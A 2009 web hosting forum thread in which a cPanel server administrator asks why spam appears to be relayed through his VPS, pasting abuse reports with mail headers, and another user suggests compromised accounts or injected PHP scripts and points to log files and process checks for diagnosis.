Community Forums
Connect with us on LinkedIn
Spam sent thru my server
  
+ Reply to Thread
Results 1 to 2 of 2
  1. 12-21-2009 01:06 PM #1
    djtommye
    djtommye is offline
    Registered User
    Join Date
    Dec 2009
    Posts
    2

    Default Spam sent thru my server

    I'm running cPanel 11.25.0-R42213 - WHM 11.25.0 - X 3.9

    I have set up SPF, DomainKeys, RBLs, etc. Yet, I'm getting cases where it appears that spammers are sending spam messages through my server. I definitely don't want to get blacklisted, and I'm only running about six domains under this VPS.

    I have contacted my web host, but they say everything looks good on their end. So I'm a bit stumped. Any suggestions would be much appreciated. I've also checked for rootkits, trojans, etc to no avail.

    When I try logging in with telnet to port 25 to send an email, if I enter a bogus MAIL FROM, then I get an authentication failed message.


    Here are two emails I received just this morning:


    Fellow abuse team:

    You're receiving this automated email because you appear listed as a contact for one or more of the referenced IP addresses according to cyberabuse.org, your address was composed from the reverse of one or more of the source IP addresses or we otherwise believe you may be related with this incident.

    The sample at the end of this message, contains a piece of spam as reported to us by one of our users. As a result, the IP addresses mentioned in the subject of this email might have been included in one or more of our following mail filtering lists:

    abuso.cantv.net/bl/spam
    abuso.cantv.net/bl/dul

    <SNIP>
    Return-Path: <$munged$@$munged$>
    Received: from rs25s1.datacenter.cha.cantv.net (10-128-141-4.ric2.cantv.net [10.128.141.4])
    by rs26s5.mgmt.cantv.net (8.14.3/8.14.3/1.0) with ESMTP id nBBFRxKa023756
    for <$munged$@$munged$>; Fri, 11 Dec 2009 10:57:59 -0430
    X-Virus-Scanned: amavisd-new at cantv.net
    X-DNSBL-MILTER: Passed
    Received: from vps.trinitytechdfw.com (vps.trinitytechdfw.com [92.48.80.173])
    by rs25s1.datacenter.cha.cantv.net (8.14.3/8.14.3/3.0) with SMTP id nBBFRsSE005459
    for <$munged$@$munged$>; Fri, 11 Dec 2009 10:57:58 -0430
    X-Matched-Lists: []
    Received: from kbejpxo (240.229.94.2)
    by vps.trinitytechdfw.com; Fri, 11 Dec 2009 09:37:16 -0600
    Date: Fri, 11 Dec 2009 09:37:16 -0600
    From: Mgrayson68 <$munged$@$munged$>
    X-Mailer: The Bat! (v2.01)
    Reply-To: Mesterwatson <$munged$@$munged$>
    X-Priority: 3 (Normal)
    Message-ID: <$munged$@$munged$>
    To: Miaesmiaes <$munged$@$munged$>
    Subject: 45 Exclusive Hardcore Sites for One Low Price!!!
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
    boundary="----------ED1B60447069BE"
    X-SPF-Scan-By: smf-spf v2.0.2 - SMFS :: Smart sendMail FilterS for spam and virus filtering
    Received-SPF: None (rs25s1.datacenter.cha.cantv.net: domain of $munged$@$munged$
    does not designate permitted sender hosts)
    receiver=rs25s1.datacenter.cha.cantv.net; client-ip=92.48.80.173;
    envelope-from=<$munged$@$munged$>; helo=vps.trinitytechdfw.com;

    <html>

    And - here's the other:
    This is an email abuse report for an email message with the message-id of 07418507.20090401034329@sympatico.ca received from IP address 92.48.80.173 on Wed, 02 Dec 2009 15:07:43 -0500
    (Message included with subject of "New Exclusive XXX video with Nicole Kidman and other celebs!")
    Last edited by Infopro; 12-21-2009 at 02:27 PM.
    Reply With Quote Reply With Quote
  2. 12-27-2009 06:30 AM #2
    claudio
    claudio is offline
    Member
    Join Date
    Jul 2004
    Posts
    212

    Default

    Hi

    i looked this logs and your case seems that are other ways to send spam through your server others than your inner security theaks

    for instance someone can simply sit at a computer and manually start to spam messages what is very unprobable as it will be had to type all stuff

    so he can place a trojan, keylogger or similar direct into the user's computer

    and can "stole" his email password or use this outlook express contacts to send this emails

    also he can infect your or more like another dedicated server and use an php script disguised as an external txt file to spam messages as well

    so you need to

    Received: from kbejpxo (240.229.94.2)
    by vps.trinitytechdfw.com; Fri, 11 Dec 2009 09:37:16 -0600
    check this ip as it seems to be either the spammer or the complainer

    if this ip is from the complainer as the header from and to are from the same domain what is always a spammer tecnique to use same headers from and to then you must discover if it is a php nobody message or an acount hacked then you must suspend it

    at your /etc/httpd/domlogs/ try to grep 'txt?' *.com to see if are attempts to run external php scripts through your server

    if your php is configured to suexec this might not be necessary as the identity of the php script will be revelead at the process

    ps -aux

    did you look at your /var/logs/exim_mainlog
    ?

    regards and good luck
    Claudio
    MultiHostBR
    http://www.multihost.com.br
    http://www.vbsfirewall.com
    Reply With Quote Reply With Quote
«   How to increase horde fetch mail limit? | Mail loop help »     
Similar Threads & Tags
Similar threads

  1. My server is being used for spam. Help...
    By partsace in forum E-mail Discussions
    Replies: 2
    Last Post: 08-06-2008, 06:39 PM
  2. Spam Server
    By markerpower in forum cPanel and WHM Discussions
    Replies: 5
    Last Post: 01-27-2008, 08:32 PM
  3. spam from server
    By labahost in forum E-mail Discussions
    Replies: 1
    Last Post: 06-23-2007, 05:26 AM
  4. SPAM??? From my server?
    By netlook in forum cPanel and WHM Discussions
    Replies: 3
    Last Post: 04-24-2004, 05:31 AM
  5. HELP! My Server is being used for spam
    By iKHost in forum cPanel and WHM Discussions
    Replies: 7
    Last Post: 02-17-2003, 06:40 PM
Tags for this Thread
Linkedin       Facebook       Twitter       RSS       Flickr       YouTube